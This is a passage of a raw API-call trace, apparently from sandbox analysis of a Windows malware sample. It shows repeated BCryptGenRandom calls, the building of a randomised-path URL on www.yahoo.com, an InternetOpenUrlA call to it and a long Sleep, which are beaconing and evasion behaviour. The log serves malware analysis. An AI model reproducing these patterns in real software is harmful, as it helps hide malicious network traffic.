pbBuffer=0x46ffd5f) returned 0x0 [0272.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2f2, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a1b2f2) returned 0x0 [0272.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.056] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.058] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.059] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.221] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.222] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.223] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.224] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.224] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.225] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.226] GetProcessHeap () returned 0x440000 [0272.226] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0272.226] lstrcpyA (in: lpString1=0x473140, lpString2="\x101\x10hs://www.yahoo.com" | out: lpString1="\x101\x10hs://www.yahoo.com") returned="\x101\x10hs://www.yahoo.com" [0272.226] lstrcatA (in: lpString1="\x101\x10hs://www.yahoo.com", lpString2="/bnpss3XlU1qgh2kq6m4v2rvs9pwt1s5zubbjknknj1nkcfmp/q4g3uWYzoR26xC7iB1D0ii1lM7pye3vqqj8kQ90b2uzPv44k/" | out: lpString1="\x101\x10hs://www.yahoo.com/bnpss3XlU1qgh2kq6m4v2rvs9pwt1s5zubbjknknj1nkcfmp/q4g3uWYzoR26xC7iB1D0ii1lM7pye3vqqj8kQ90b2uzPv44k/") returned="\x101\x10hs://www.yahoo.com/bnpss3XlU1qgh2kq6m4v2rvs9pwt1s5zubbjknknj1nkcfmp/q4g3uWYzoR26xC7iB1D0ii1lM7pye3vqqj8kQ90b2uzPv44k/" [0272.226] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0272.226] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x101\x10hs://www.yahoo.com/bnpss3XlU1qgh2kq6m4v2rvs9pwt1s5zubbjknknj1nkcfmp/q4g3uWYzoR26xC7iB1D0ii1lM7pye3vqqj8kQ90b2uzPv44k/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0272.226] GetProcessHeap () returned 0x440000 [0272.226] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0272.226] GetProcessHeap () returned 0x440000 [0272.226] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b2c0 | out: hHeap=0x440000) returned 1 [0272.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0272.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0272.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0272.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0272.227] Sleep (dwMilliseconds=0x19218) [0272.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0272.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.400] GetProcessHeap () returned 0x440000 [0272.400] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01e50 [0272.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01e51, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a01e51) returned 0x0 [0272.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0272.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01e76, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a01e76) returned 0x0 [0272.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0272.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0272.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0272.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0272.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 